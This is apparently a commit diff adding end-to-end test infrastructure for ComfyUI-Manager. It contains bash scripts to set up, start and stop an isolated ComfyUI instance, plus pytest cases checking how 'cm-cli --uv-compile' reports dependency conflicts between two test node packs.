# setup_e2e_env.sh — Automated E2E environment setup for ComfyUI + Manager
#
# Creates an isolated ComfyUI installation with ComfyUI-Manager for E2E testing.
# Idempotent: skips setup if marker file and key artifacts already exist.
#
# Input env vars:
# E2E_ROOT — target directory (default: auto-generated via mktemp)
# MANAGER_ROOT — manager repo root (default: auto-detected from script location)
# COMFYUI_BRANCH — ComfyUI branch to clone (default: master)
# PYTHON — Python executable (default: python3)
#
# Output (last line of stdout):
# E2E_ROOT=/path/to/environment
#
# Exit: 0=success, 1=failure
set -euo pipefail
# --- Constants ---
COMFYUI_REPO="https://github.com/comfyanonymous/ComfyUI.git"
PYTORCH_CPU_INDEX="https://download.pytorch.org/whl/cpu"
CONFIG_INI_CONTENT="[default]
use_uv = true
use_unified_resolver = true
file_logging = false"
# --- Logging helpers ---
log() { echo "[setup_e2e] $*"; }
err() { echo "[setup_e2e] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Detect manager root by walking up from script dir to find pyproject.toml ---
detect_manager_root() {
local dir
dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
while [[ "$dir" != "/" ]]; do
if [[ -f "$dir/pyproject.toml" ]]; then
echo "$dir"
return 0
fi
dir="$(dirname "$dir")"
done
return 1
}
# --- Validate prerequisites ---
validate_prerequisites() {
local py="${PYTHON:-python3}"
local missing=()
command -v git >/dev/null 2>&1 || missing+=("git")
command -v uv >/dev/null 2>&1 || missing+=("uv")
command -v "$py" >/dev/null 2>&1 || missing+=("$py")
if [[ ${#missing[@]} -gt 0 ]]; then
die "Missing prerequisites: ${missing[*]}"
fi
# Verify Python version >= 3.9
local py_version
py_version=$("$py" -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
local major minor
major="${py_version%%.*}"
minor="${py_version##*.}"
if [[ "$major" -lt 3 ]] || { [[ "$major" -eq 3 ]] && [[ "$minor" -lt 9 ]]; }; then
die "Python 3.9+ required, found $py_version"
fi
log "Prerequisites OK (python=$py_version, git=$(git --version | awk '{print $3}'), uv=$(uv --version 2>&1 | awk '{print $2}'))"
}
# --- Check idempotency: skip if already set up ---
check_already_setup() {
local root="$1"
if [[ -f "$root/.e2e_setup_complete" ]] \
&& [[ -d "$root/comfyui" ]] \
&& [[ -d "$root/venv" ]] \
&& [[ -f "$root/comfyui/user/__manager/config.ini" ]] \
&& [[ -L "$root/comfyui/custom_nodes/ComfyUI-Manager" ]]; then
log "Environment already set up at $root (marker file exists). Skipping."
echo "E2E_ROOT=$root"
exit 0
fi
}
# --- Verify the setup ---
verify_setup() {
local root="$1"
local manager_root="$2"
local venv_py="$root/venv/bin/python"
local errors=0
log "Running verification checks..."
# Check ComfyUI directory
if [[ ! -f "$root/comfyui/main.py" ]]; then
err "Verification FAIL: comfyui/main.py not found"
((errors++))
fi
# Check venv python
if [[ ! -x "$venv_py" ]]; then
err "Verification FAIL: venv python not executable"
((errors++))
fi
# Check symlink
local link_target="$root/comfyui/custom_nodes/ComfyUI-Manager"
if [[ ! -L "$link_target" ]]; then
err "Verification FAIL: symlink $link_target does not exist"
((errors++))
elif [[ "$(readlink -f "$link_target")" != "$(readlink -f "$manager_root")" ]]; then
err "Verification FAIL: symlink target mismatch"
((errors++))
fi
# Check config.ini
if [[ ! -f "$root/comfyui/user/__manager/config.ini" ]]; then
err "Verification FAIL: config.ini not found"
((errors++))
fi
# Check Python imports
# comfy is a local package inside ComfyUI (not pip-installed), and
# comfyui_manager.__init__ imports from comfy — both need PYTHONPATH
if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfy" 2>/dev/null; then
err "Verification FAIL: 'import comfy' failed"
((errors++))
fi
if ! PYTHONPATH="$root/comfyui" "$venv_py" -c "import comfyui_manager" 2>/dev/null; then
err "Verification FAIL: 'import comfyui_manager' failed"
((errors++))
fi
if [[ "$errors" -gt 0 ]]; then
die "Verification failed with $errors error(s)"
fi
log "Verification OK: all checks passed"
}
# ===== Main =====
# Resolve MANAGER_ROOT
if [[ -z "${MANAGER_ROOT:-}" ]]; then
MANAGER_ROOT="$(detect_manager_root)" || die "Cannot detect MANAGER_ROOT. Set it explicitly."
fi
MANAGER_ROOT="$(cd "$MANAGER_ROOT" && pwd)"
log "MANAGER_ROOT=$MANAGER_ROOT"
# Validate prerequisites
validate_prerequisites
PYTHON="${PYTHON:-python3}"
COMFYUI_BRANCH="${COMFYUI_BRANCH:-master}"
# Create or use E2E_ROOT
CREATED_BY_US=false
if [[ -z "${E2E_ROOT:-}" ]]; then
E2E_ROOT="$(mktemp -d -t e2e_comfyui_XXXXXX)"
CREATED_BY_US=true
log "Created E2E_ROOT=$E2E_ROOT"
else
mkdir -p "$E2E_ROOT"
log "Using E2E_ROOT=$E2E_ROOT"
fi
# Idempotency check
check_already_setup "$E2E_ROOT"
# Cleanup trap: remove E2E_ROOT on failure only if we created it
cleanup_on_failure() {
local exit_code=$?
if [[ "$exit_code" -ne 0 ]] && [[ "$CREATED_BY_US" == "true" ]]; then
err "Setup failed. Cleaning up $E2E_ROOT"
rm -rf "$E2E_ROOT"
fi
}
trap cleanup_on_failure EXIT
# Step 1: Clone ComfyUI
log "Step 1/8: Cloning ComfyUI (branch=$COMFYUI_BRANCH)..."
if [[ -d "$E2E_ROOT/comfyui/.git" ]]; then
log " ComfyUI already cloned, skipping"
else
git clone --depth=1 --branch "$COMFYUI_BRANCH" "$COMFYUI_REPO" "$E2E_ROOT/comfyui"
fi
# Step 2: Create virtual environment
log "Step 2/8: Creating virtual environment..."
if [[ -d "$E2E_ROOT/venv" ]]; then
log " venv already exists, skipping"
else
uv venv "$E2E_ROOT/venv"
fi
VENV_PY="$E2E_ROOT/venv/bin/python"
# Step 3: Install ComfyUI dependencies
log "Step 3/8: Installing ComfyUI dependencies (CPU-only)..."
uv pip install \
--python "$VENV_PY" \
-r "$E2E_ROOT/comfyui/requirements.txt" \
--extra-index-url "$PYTORCH_CPU_INDEX"
# Step 4: Install ComfyUI-Manager (non-editable, production-like)
log "Step 4/8: Installing ComfyUI-Manager..."
uv pip install --python "$VENV_PY" "$MANAGER_ROOT"
# Step 5: Create symlink for custom_nodes discovery
log "Step 5/8: Creating custom_nodes symlink..."
mkdir -p "$E2E_ROOT/comfyui/custom_nodes"
local_link="$E2E_ROOT/comfyui/custom_nodes/ComfyUI-Manager"
if [[ -L "$local_link" ]]; then
log " Symlink already exists, updating"
rm -f "$local_link"
fi
ln -s "$MANAGER_ROOT" "$local_link"
# Step 6: Write config.ini to correct path
log "Step 6/8: Writing config.ini..."
mkdir -p "$E2E_ROOT/comfyui/user/__manager"
echo "$CONFIG_INI_CONTENT" > "$E2E_ROOT/comfyui/user/__manager/config.ini"
# Step 7: Create HOME isolation directories
log "Step 7/8: Creating HOME isolation directories..."
mkdir -p "$E2E_ROOT/home/.config"
mkdir -p "$E2E_ROOT/home/.local/share"
mkdir -p "$E2E_ROOT/logs"
# Step 8: Verify setup
log "Step 8/8: Verifying setup..."
verify_setup "$E2E_ROOT" "$MANAGER_ROOT"
# Write marker file
date -Iseconds > "$E2E_ROOT/.e2e_setup_complete"
# Clear the EXIT trap since setup succeeded
trap - EXIT
log "Setup complete."
echo "E2E_ROOT=$E2E_ROOT"

View File

@ -0,0 +1,129 @@
#!/usr/bin/env bash
# start_comfyui.sh — Foreground-blocking ComfyUI launcher for E2E tests
#
# Starts ComfyUI in the background, then blocks the foreground until the server
# is ready (or timeout). This makes it safe to call from subprocess.run() or
# Claude's Bash tool — the call returns only when ComfyUI is accepting requests.
#
# Input env vars:
# E2E_ROOT — (required) path to E2E environment from setup_e2e_env.sh
# PORT — ComfyUI listen port (default: 8199)
# TIMEOUT — max seconds to wait for readiness (default: 120)
#
# Output (last line on success):
# COMFYUI_PID=<pid> PORT=<port>
#
# Exit: 0=ready, 1=timeout/failure
set -euo pipefail
# --- Defaults ---
PORT="${PORT:-8199}"
TIMEOUT="${TIMEOUT:-120}"
# --- Logging helpers ---
log() { echo "[start_comfyui] $*"; }
err() { echo "[start_comfyui] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Validate environment ---
[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
[[ -d "$E2E_ROOT/comfyui" ]] || die "ComfyUI not found at $E2E_ROOT/comfyui"
[[ -x "$E2E_ROOT/venv/bin/python" ]] || die "venv python not found at $E2E_ROOT/venv/bin/python"
[[ -f "$E2E_ROOT/.e2e_setup_complete" ]] || die "Setup marker not found. Run setup_e2e_env.sh first."
PY="$E2E_ROOT/venv/bin/python"
COMFY_DIR="$E2E_ROOT/comfyui"
LOG_DIR="$E2E_ROOT/logs"
LOG_FILE="$LOG_DIR/comfyui.log"
PID_FILE="$LOG_DIR/comfyui.pid"
mkdir -p "$LOG_DIR"
# --- Check/clear port ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
log "Port $PORT is in use. Attempting to stop existing process..."
# Try to read existing PID file
if [[ -f "$PID_FILE" ]]; then
OLD_PID="$(cat "$PID_FILE")"
if kill -0 "$OLD_PID" 2>/dev/null; then
kill "$OLD_PID" 2>/dev/null || true
sleep 2
fi
fi
# Fallback: kill by port pattern
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 2
fi
# Final check
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
die "Port $PORT is still in use after cleanup attempt"
fi
log "Port $PORT cleared."
fi
# --- Start ComfyUI ---
log "Starting ComfyUI on port $PORT..."
# Create empty log file (ensures tail -f works from the start)
: > "$LOG_FILE"
# Launch with unbuffered Python output so log lines appear immediately
PYTHONUNBUFFERED=1 \
HOME="$E2E_ROOT/home" \
nohup "$PY" "$COMFY_DIR/main.py" \
--cpu \
--enable-manager \
--port "$PORT" \
> "$LOG_FILE" 2>&1 &
COMFYUI_PID=$!
echo "$COMFYUI_PID" > "$PID_FILE"
log "ComfyUI PID=$COMFYUI_PID, log=$LOG_FILE"
# Verify process didn't crash immediately
sleep 1
if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
err "ComfyUI process died immediately. Last 30 lines of log:"
tail -n 30 "$LOG_FILE" >&2
rm -f "$PID_FILE"
exit 1
fi
# --- Block until ready ---
# tail -n +1 -f: read from file start AND follow new content (no race condition)
# grep -q -m1: exit on first match → tail gets SIGPIPE → pipeline ends
# timeout: kill the pipeline after TIMEOUT seconds
log "Waiting up to ${TIMEOUT}s for ComfyUI to become ready..."
if timeout "$TIMEOUT" bash -c \
"tail -n +1 -f '$LOG_FILE' 2>/dev/null | grep -q -m1 'To see the GUI'"; then
log "ComfyUI startup message detected."
else
err "Timeout (${TIMEOUT}s) waiting for ComfyUI. Last 30 lines of log:"
tail -n 30 "$LOG_FILE" >&2
kill "$COMFYUI_PID" 2>/dev/null || true
rm -f "$PID_FILE"
exit 1
fi
# Verify process is still alive after readiness detected
if ! kill -0 "$COMFYUI_PID" 2>/dev/null; then
err "ComfyUI process died after readiness signal. Last 30 lines:"
tail -n 30 "$LOG_FILE" >&2
rm -f "$PID_FILE"
exit 1
fi
# Optional HTTP health check
if command -v curl >/dev/null 2>&1; then
if curl -sf "http://127.0.0.1:${PORT}/system_stats" >/dev/null 2>&1; then
log "HTTP health check passed (/system_stats)"
else
log "HTTP health check skipped (endpoint not yet available, but startup message detected)"
fi
fi
log "ComfyUI is ready."
echo "COMFYUI_PID=$COMFYUI_PID PORT=$PORT"

View File

@ -0,0 +1,75 @@
#!/usr/bin/env bash
# stop_comfyui.sh — Graceful ComfyUI shutdown for E2E tests
#
# Stops a ComfyUI process previously started by start_comfyui.sh.
# Uses SIGTERM first, then SIGKILL after a grace period.
#
# Input env vars:
# E2E_ROOT — (required) path to E2E environment
# PORT — ComfyUI port for fallback pkill (default: 8199)
#
# Exit: 0=stopped, 1=failed
set -euo pipefail
PORT="${PORT:-8199}"
GRACE_PERIOD=10
# --- Logging helpers ---
log() { echo "[stop_comfyui] $*"; }
err() { echo "[stop_comfyui] ERROR: $*" >&2; }
die() { err "$@"; exit 1; }
# --- Validate ---
[[ -n "${E2E_ROOT:-}" ]] || die "E2E_ROOT is not set"
PID_FILE="$E2E_ROOT/logs/comfyui.pid"
# --- Read PID ---
COMFYUI_PID=""
if [[ -f "$PID_FILE" ]]; then
COMFYUI_PID="$(cat "$PID_FILE")"
log "Read PID=$COMFYUI_PID from $PID_FILE"
fi
# --- Graceful shutdown via SIGTERM ---
if [[ -n "$COMFYUI_PID" ]] && kill -0 "$COMFYUI_PID" 2>/dev/null; then
log "Sending SIGTERM to PID $COMFYUI_PID..."
kill "$COMFYUI_PID" 2>/dev/null || true
# Wait for graceful shutdown
elapsed=0
while kill -0 "$COMFYUI_PID" 2>/dev/null && [[ "$elapsed" -lt "$GRACE_PERIOD" ]]; do
sleep 1
elapsed=$((elapsed + 1))
done
# Force kill if still alive
if kill -0 "$COMFYUI_PID" 2>/dev/null; then
log "Process still alive after ${GRACE_PERIOD}s. Sending SIGKILL..."
kill -9 "$COMFYUI_PID" 2>/dev/null || true
sleep 1
fi
fi
# --- Fallback: kill by port pattern ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
log "Port $PORT still in use. Attempting pkill fallback..."
pkill -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 2
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
pkill -9 -f "main\\.py.*--port $PORT" 2>/dev/null || true
sleep 1
fi
fi
# --- Cleanup PID file ---
rm -f "$PID_FILE"
# --- Verify port is free ---
if ss -tlnp 2>/dev/null | grep -q ":${PORT}\b"; then
die "Port $PORT is still in use after shutdown"
fi
log "ComfyUI stopped."

View File

@ -0,0 +1,254 @@
"""E2E tests for cm-cli --uv-compile across all supported commands.
Requires a pre-built E2E environment (from setup_e2e_env.sh).
Set E2E_ROOT env var to point at it, or the tests will be skipped.
Supply-chain safety policy:
To prevent supply-chain attacks, E2E tests MUST only install node packs
from verified, controllable authors (ltdrdata, comfyanonymous, etc.).
Currently this suite uses only ltdrdata's dedicated test packs
(nodepack-test1-do-not-install, nodepack-test2-do-not-install) which
are intentionally designed for conflict testing and contain no
executable code. Adding packs from unverified sources is prohibited.
Usage:
E2E_ROOT=/tmp/e2e_full_test pytest tests/e2e/test_e2e_uv_compile.py -v
"""
from __future__ import annotations
import os
import shutil
import subprocess
import pytest
E2E_ROOT = os.environ.get("E2E_ROOT", "")
COMFYUI_PATH = os.path.join(E2E_ROOT, "comfyui") if E2E_ROOT else ""
CM_CLI = os.path.join(E2E_ROOT, "venv", "bin", "cm-cli") if E2E_ROOT else ""
CUSTOM_NODES = os.path.join(COMFYUI_PATH, "custom_nodes") if COMFYUI_PATH else ""
REPO_TEST1 = "https://github.com/ltdrdata/nodepack-test1-do-not-install"
REPO_TEST2 = "https://github.com/ltdrdata/nodepack-test2-do-not-install"
PACK_TEST1 = "nodepack-test1-do-not-install"
PACK_TEST2 = "nodepack-test2-do-not-install"
pytestmark = pytest.mark.skipif(
not E2E_ROOT or not os.path.isfile(os.path.join(E2E_ROOT, ".e2e_setup_complete")),
reason="E2E_ROOT not set or E2E environment not ready (run setup_e2e_env.sh first)",
)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _run_cm_cli(*args: str, timeout: int = 180) -> subprocess.CompletedProcess:
"""Run cm-cli in the E2E environment."""
env = {**os.environ, "COMFYUI_PATH": COMFYUI_PATH}
return subprocess.run(
[CM_CLI, *args],
capture_output=True,
text=True,
timeout=timeout,
env=env,
)
def _remove_pack(name: str) -> None:
"""Remove a node pack from custom_nodes (if it exists)."""
path = os.path.join(CUSTOM_NODES, name)
if os.path.islink(path):
os.unlink(path)
elif os.path.isdir(path):
shutil.rmtree(path, ignore_errors=True)
def _pack_exists(name: str) -> bool:
return os.path.isdir(os.path.join(CUSTOM_NODES, name))
# ---------------------------------------------------------------------------
# Fixtures
# ---------------------------------------------------------------------------
@pytest.fixture(autouse=True)
def _clean_test_packs():
"""Ensure test node packs are removed before and after each test."""
_remove_pack(PACK_TEST1)
_remove_pack(PACK_TEST2)
yield
_remove_pack(PACK_TEST1)
_remove_pack(PACK_TEST2)
# ---------------------------------------------------------------------------
# Tests
# ---------------------------------------------------------------------------
class TestInstall:
"""cm-cli install --uv-compile"""
def test_install_single_pack_resolves(self):
"""Install one test pack with --uv-compile → resolve succeeds."""
r = _run_cm_cli("install", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert _pack_exists(PACK_TEST1)
assert "Installation was successful" in combined
assert "Resolved" in combined
def test_install_conflicting_packs_shows_attribution(self):
"""Install two conflicting packs → conflict attribution output."""
# Install first (no conflict yet)
r1 = _run_cm_cli("install", "--uv-compile", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
assert "Resolved" in r1.stdout + r1.stderr
# Install second → conflict
r2 = _run_cm_cli("install", "--uv-compile", REPO_TEST2)
combined = r2.stdout + r2.stderr
assert _pack_exists(PACK_TEST2)
assert "Installation was successful" in combined
assert "Resolution failed" in combined
assert "Conflicting packages (by node pack):" in combined
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined
assert "ansible" in combined.lower()
class TestReinstall:
"""cm-cli reinstall --uv-compile"""
def test_reinstall_with_uv_compile(self):
"""Reinstall an existing pack with --uv-compile."""
# Install first
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
# Reinstall with --uv-compile
r = _run_cm_cli("reinstall", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
# uv-compile should run (resolve output present)
assert "Resolving dependencies" in combined
class TestUpdate:
"""cm-cli update --uv-compile"""
def test_update_single_with_uv_compile(self):
"""Update an installed pack with --uv-compile."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("update", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
def test_update_all_with_uv_compile(self):
"""update all --uv-compile runs uv-compile after updating."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("update", "--uv-compile", "all")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestFix:
"""cm-cli fix --uv-compile"""
def test_fix_single_with_uv_compile(self):
"""Fix an installed pack with --uv-compile."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("fix", "--uv-compile", REPO_TEST1)
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
def test_fix_all_with_uv_compile(self):
"""fix all --uv-compile runs uv-compile after fixing."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("fix", "--uv-compile", "all")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestUvCompileStandalone:
"""cm-cli uv-compile (standalone command)"""
def test_uv_compile_no_packs(self):
"""uv-compile with no node packs → 'No custom node packs found'."""
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
# Only ComfyUI-Manager exists (no requirements.txt in it normally)
# so either "No custom node packs found" or resolves 0
assert r.returncode == 0 or "No custom node packs" in combined
def test_uv_compile_with_packs(self):
"""uv-compile after installing test pack → resolves."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
assert "Resolved" in combined
def test_uv_compile_conflict_attribution(self):
"""uv-compile with conflicting packs → shows attribution."""
_run_cm_cli("install", REPO_TEST1)
_run_cm_cli("install", REPO_TEST2)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
assert r.returncode != 0
assert "Conflicting packages (by node pack):" in combined
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined
class TestRestoreDependencies:
"""cm-cli restore-dependencies --uv-compile"""
def test_restore_dependencies_with_uv_compile(self):
"""restore-dependencies --uv-compile runs resolver after restore."""
_run_cm_cli("install", REPO_TEST1)
assert _pack_exists(PACK_TEST1)
r = _run_cm_cli("restore-dependencies", "--uv-compile")
combined = r.stdout + r.stderr
assert "Resolving dependencies" in combined
class TestConflictAttributionDetail:
"""Verify conflict attribution output details."""
def test_both_packs_and_specs_shown(self):
"""Conflict output shows pack names AND version specs."""
_run_cm_cli("install", REPO_TEST1)
_run_cm_cli("install", REPO_TEST2)
r = _run_cm_cli("uv-compile")
combined = r.stdout + r.stderr
# Processed attribution must show exact version specs (not raw uv error)
assert "Conflicting packages (by node pack):" in combined
assert "ansible==9.13.0" in combined
assert "ansible-core==2.14.0" in combined
# Both pack names present in attribution block
assert PACK_TEST1 in combined
assert PACK_TEST2 in combined

File diff suppressed because it is too large Load Diff